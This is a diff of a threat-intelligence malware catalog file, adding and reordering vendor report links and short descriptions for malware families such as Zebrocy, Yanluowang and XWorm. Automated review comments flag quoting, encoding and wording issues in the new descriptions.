"https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html", - "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/" + "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", + "https://github.com/br-data/2019-winnti-analyse/", + "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", + 
"https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/", + "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", + "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", + "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf", + "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "http://web.br.de/interaktiv/winnti/english/", + "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf" ], "synonyms": [ "BleDoor", @@ -50685,9 +53185,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", - "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/", - "https://securelist.com/atm-robber-winpot/89611/" + "https://securelist.com/atm-robber-winpot/89611/", + "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/" ], "synonyms": [ "ATMPot" 
@@ -50728,11 +53228,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot", - "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://docs.broadcom.com/doc/waterbug-attack-group", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", - "https://docs.broadcom.com/doc/waterbug-attack-group" + "https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf" ], "synonyms": [ "Epic", @@ -50817,9 +53317,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger", - "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf", "http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf", - "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", + "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf" ], "synonyms": [ "WoolenLogger" 
@@ -50848,8 +53348,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole", - "https://content.fireeye.com/apt/rpt-apt38", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" + "https://securelist.com/lazarus-under-the-hood/77908/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf", + "https://content.fireeye.com/apt/rpt-apt38" ], "synonyms": [], "type": [] @@ -50890,8 +53391,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl", - "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", - "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/", + "https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" ], "synonyms": [], "type": [] @@ -50904,9 +53405,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink", - "https://twitter.com/darienhuss/status/1453342652682981378", + "https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/", "https://www.welivesecurity.com/wp-content/uploads/2022/03/eset_wsliknkvm.pdf", - "https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/" + "https://twitter.com/darienhuss/status/1453342652682981378" ], "synonyms": [ "FinickyFrogfish" 
@@ -50921,8 +53422,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.x4",
- "https://www.gradiant.org/noticia/analysis-malware-cve-2017/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage"
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage",
+ "https://www.gradiant.org/noticia/analysis-malware-cve-2017/"
 ],
 "synonyms": [],
 "type": []
@@ -50936,20 +53437,20 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", - "https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", - "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", + "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/", - "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", - "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-twilight" + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf", + 
"https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" ], "synonyms": [ "chopstick", @@ -51018,10 +53519,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy", - "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/", "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf", + "https://github.com/eset/malware-ioc/tree/master/xdspy/", "https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf", - "https://github.com/eset/malware-ioc/tree/master/xdspy/" + "https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/" ], "synonyms": [], "type": [] @@ -51090,8 +53591,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xfscashncr", - "https://twitter.com/r3c0nst/status/1166773324548063232", - "https://blog.cyttek.com/2019/08/28/other-day-other-malware-in-the-way-died-exe/" + "https://blog.cyttek.com/2019/08/28/other-day-other-malware-in-the-way-died-exe/", + "https://twitter.com/r3c0nst/status/1166773324548063232" ], "synonyms": [], "type": [] @@ -51128,7 +53629,7 @@ "value": "xmrig" }, { - "description": "", + "description": "According to PCrisk, Xorist is a family of ransomware-type malware. After stealth system infiltration, ransomware from this family encrypts various files stored on the computer. After encrypting the files, this ransomware creates a 'How to Decrypt Files.txt text file on the victim's desktop. The file contains a message stating that the files can only be restored by paying a ransom.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xorist", 
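Review bot: The new win.xorist description has an unbalanced quote: `'How to Decrypt Files.txt text file` opens a single quote that is never closed, so the file name bleeds into the rest of the sentence. It should read `'How to Decrypt Files.txt' text file` (or drop the quotes altogether). Since the text is attributed to PCrisk, the correction belongs in the source that is synced into this file rather than as a hand edit here, otherwise the next regeneration reintroduces it.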
@@ -51160,9 +53661,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpack", + "https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html", "https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks", - "https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html" + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks" ], "synonyms": [ "NERAPACK" @@ -51177,8 +53678,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpan", - "https://securelist.com/blog/research/78110/xpan-i-am-your-father/", - "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/" + "https://securelist.com/blog/research/76153/teamxrat-brazilian-cybercrime-meets-ransomware/", + "https://securelist.com/blog/research/78110/xpan-i-am-your-father/" ], "synonyms": [], "type": [] 
@@ -51204,13 +53705,13 @@
 "value": "XPCTRA"
 },
 {
- "description": "",
+ "description": "According to PCrisk, XpertRAT is a Remote Administration Trojan, a malicious program that allows cyber criminals to remotely access and control infected computers. Typically, users download and install this software inadvertently because they are tricked. By having computers infected with malware such as XpertRAT, users can experience serious problems.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat",
 "https://labs.k7computing.com/?p=15672",
- "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration",
- "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html"
+ "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html",
+ "https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration"
 ],
 "synonyms": [],
 "type": []
@@ -51252,9 +53753,9 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus",
- "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf",
+ "https://securelist.com/analysis/publications/69953/the-naikon-apt/",
 "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://securelist.com/analysis/publications/69953/the-naikon-apt/"
+ "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf"
 ],
 "synonyms": [
 "nokian"
@@ -51269,18 +53770,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel", - "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", "https://securelist.com/big-threats-using-code-similarity-part-1/97239/", - "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf", - "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", + "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", + "https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf", + "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", - "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government", - "https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-twilight" + "http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", + 
"https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" ], "synonyms": [ "Shunnael", @@ -51306,7 +53807,7 @@ "value": "X-Tunnel (.NET)" }, { - "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", @@ -51323,9 +53824,14 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm", - "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/", + "https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4", + "https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/", + "https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/", + "https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/", + "https://x.com/embee_research/status/1694635899903152619", + "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", "https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla", - "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/" + "https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/" ], "synonyms": [], "type": [] 
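Review bot: The only change in the win.xwo hunk replaces literal curly quotes with `\u201c`/`\u201d`, and the new YTStealer, Yanluowang and Zebrocy descriptions likewise arrive with `\u2019` and `\r\n` escapes, which suggests the serializer now escapes non-ASCII (ensure_ascii-style output). Both forms are valid JSON and decode identically, but the old Xwo line shows the file previously stored literal UTF-8, so any entry not touched by this sync presumably still does and the file becomes mixed; every description containing a non-ASCII character will then churn the next time it is exported with the other setting. Pin one setting in the export (UTF-8 literals being the more readable for a file kept in git) so that an encoding flip does not surface as content changes.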
@@ -51338,12 +53844,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", "https://www.macnica.net/mpressioncss/feature_05.html/", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", - "https://www.secureworks.com/research/threat-profiles/bronze-butler", + "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors", + "https://www.secureworks.com/research/threat-profiles/bronze-butler", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/" ], "synonyms": [ @@ -51389,9 +53895,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yamabot", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.youtube.com/watch?v=nUjxH1gW53s", + "https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF", "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html?m=1", - "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html" + "https://blogs.jpcert.or.jp/en/2022/07/yamabot.html", + "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html" ], "synonyms": [ "Kaos" 
@@ -51402,19 +53910,19 @@ "value": "YamaBot" }, { - "description": "Ransomware.", + "description": "According to PCrisk, Yanluowang is ransomware that encrypts (and renames) files, ends all running processes, stops services, and creates the \"README.txt\" file containing a ransom note. It appends the \".yanluowang\" extension to filenames. Cybercriminals behind Yanluowang are targeting enterprise entities and organizations in the financial sector.\r\n\r\nFiles encrypted by Yanluowang can be decrypted with this tool (it is possible to decrypt all files if the original file is larger than 3GB. If the original file is smaller than 3GB, then only smaller files can be decrypted).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/", - "https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang", + "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/", "https://de.darktrace.com/blog/inside-the-yanluowang-leak-organization-members-and-tactics", - "https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/", + "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html", "https://twitter.com/CryptoInsane/status/1586967110504398853", - "https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/" + "https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/", + 
"https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware", + "https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/" ], "synonyms": [ "Dryxiphia" @@ -51429,8 +53937,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarat", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks" + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/" ], "synonyms": [], "type": [] @@ -51443,8 +53951,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yarraq", - "https://twitter.com/GrujaRS/status/1210541690349662209", - "https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview" + "https://yomi.yoroi.company/report/5e1d7b06c21640608183de58/5e1d7b09d1cc4993da62f261/overview", + "https://twitter.com/GrujaRS/status/1210541690349662209" ], "synonyms": [], "type": [] 
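Review bot: The new win.yanluowang description ends with `can be decrypted with this tool`, but "this tool" points at nothing inside the entry; presumably the PCrisk text carried a hyperlink that was lost when the sentence was copied. Rewording it to lean on the refs already in the list, e.g. `can be decrypted with the free decryptor covered in the securelist and BleepingComputer references`, keeps the claim verifiable from the entry itself. The string also embeds `\r\n\r\n` paragraph breaks (as does the Zebrocy description further down), which put raw CR characters into a field most renderers treat as a single line; `\n` or a single paragraph would be cleaner, and again the fix belongs in the synced source.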
@@ -51452,6 +53960,19 @@
 "uuid": "3bba089d-cd27-465c-8c40-2ff9ff0316c6",
 "value": "Yarraq"
 },
+ {
+ "description": "According to Palo Alto Networks, Yasso is an open source multi-platform intranet-assisted penetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and running arbitrary commands. It is authored by a Mandarin-speaking pentester nicknamed Sairson.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.yasso",
+ "https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d58a18e8-e866-42df-a315-a1f72d2c26aa",
+ "value": "Yasso"
+ },
 {
 "description": "",
 "meta": {
@@ -51557,7 +54078,7 @@
 "value": "YourCyanide"
 },
 {
- "description": "",
+ "description": "According to Intezer, YTStealer is a malware whose objective is to steal YouTube authentication cookies. As a stealer, it operates like many other stealers. The first thing it does when it\u2019s executed is to perform some environment checks. This is to detect if the malware is being analyzed in a sandbox.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.ytstealer",
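Review bot: The Yasso entry describes an open-source, multi-platform intranet penetration toolset written by a named pentester, i.e. dual-use tooling rather than a malware family, yet `type` is left as `[]` exactly like the malware entries around it. If the galaxy's `type` field is meant to distinguish tooling from malware, populating it here would let consumers filter the two apart; if `type` is unused by the exporter, that distinction is worth keeping in the description. The Malpedia slug `win.yasso` also files it under a Windows prefix although the description calls it multi-platform, which is worth a glance upstream.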
@@ -51575,13 +54096,13 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty",
- "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/",
 "https://www.amnesty.org/en/wp-content/uploads/2021/10/AFR5747562021ENGLISH.pdf",
 "https://ti.360.net/blog/articles/latest-activity-of-apt-c-35/",
- "http://blog.ptsecurity.com/2019/11/studying-donot-team.html",
- "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/",
 "https://www.secureworks.com/research/threat-profiles/zinc-emerson",
- "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/"
+ "http://blog.ptsecurity.com/2019/11/studying-donot-team.html",
+ "https://threatrecon.nshc.net/2019/08/02/sectore02-updates-yty-framework-in-new-targeted-campaign-against-pakistan-government/",
+ "https://www.arbornetworks.com/blog/asert/donot-team-leverages-new-modular-malware-framework-south-asia/",
+ "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/"
 ],
 "synonyms": [],
 "type": []
@@ -51633,43 +54154,43 @@
 "value": "Zacinlo"
 },
 {
- "description": "",
+ "description": "According to brandefense, Zebrocy is malware that falls into the Trojan category, which the threat actor group APT28/Sofacy has used since 2015. Zebrocy malware consists of 3 main components; Backdoor, Downloader, and Dropper. The Downloader and Dropper take responsibility for discovery processes and downloading the main malware on the systems. At the same time, Backdoor undertakes the duties such as persistence in the system, espionage, and data extraction.\r\n\r\nThis malware, which is not considered new, has variants in many languages from the past to the present. These include programming languages such as Delphi, C#, Visual C++, VB.net, and Golang. Furthermore, we know advanced threat actors and groups revise their malicious software among their toolkits at certain time intervals using different languages and technologies.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy",
- "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/",
- "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html",
- "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/",
- "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b",
- "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/",
- "https://research.checkpoint.com/malware-against-the-c-monoculture/",
- "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
- "https://mp.weixin.qq.com/s/pE_6VRDk-2aTI996sff0og",
- "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
+ "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/",
 "https://securelist.com/zebrocys-multilanguage-malware-salad/90680/",
- "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
- "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
- "https://meltx0r.github.io/tech/2019/10/24/apt28.html",
- "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/",
- "https://www.secureworks.com/research/threat-profiles/iron-twilight",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware",
- "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
- "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
+ "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/",
+ "https://brandefense.io/zebrocy-malware-technical-analysis-report/",
+ "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/",
+ "https://securelist.com/a-zebrocy-go-downloader/89419/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
+ "https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government",
+ "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g",
 "https://quointelligence.eu/2020/09/apt28-zebrocy-malware-campaign-nato-theme/",
- "https://securelist.com/apt-trends-report-q2-2019/91897/",
 "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html",
 "https://www.bleepingcomputer.com/news/security/russian-hackers-use-fake-nato-training-docs-to-breach-govt-networks/",
+ "https://www.secureworks.com/research/threat-profiles/iron-twilight",
+ "https://research.checkpoint.com/malware-against-the-c-monoculture/",
+ "https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/",
+ "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html",
+ "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries",
+ "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
+ "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html",
+ "https://meltx0r.github.io/tech/2019/10/24/apt28.html",
+ "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware",
+ "https://www.intezer.com/blog/research/russian-apt-uses-covid-19-lures-to-deliver-zebrocy/",
+ "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
+ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
 "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/",
 "https://www.welivesecurity.com/2019/09/24/no-summer-vacations-zebrocy/",
- "https://securelist.com/a-zebrocy-go-downloader/89419/",
- "https://mp.weixin.qq.com/s/6R7bFs9lH1I3BNdkatCC9g",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://brandefense.io/zebrocy-malware-technical-analysis-report/",
- "https://unit42.paloaltonetworks.com/atoms/fighting-ursa/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf"
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303b",
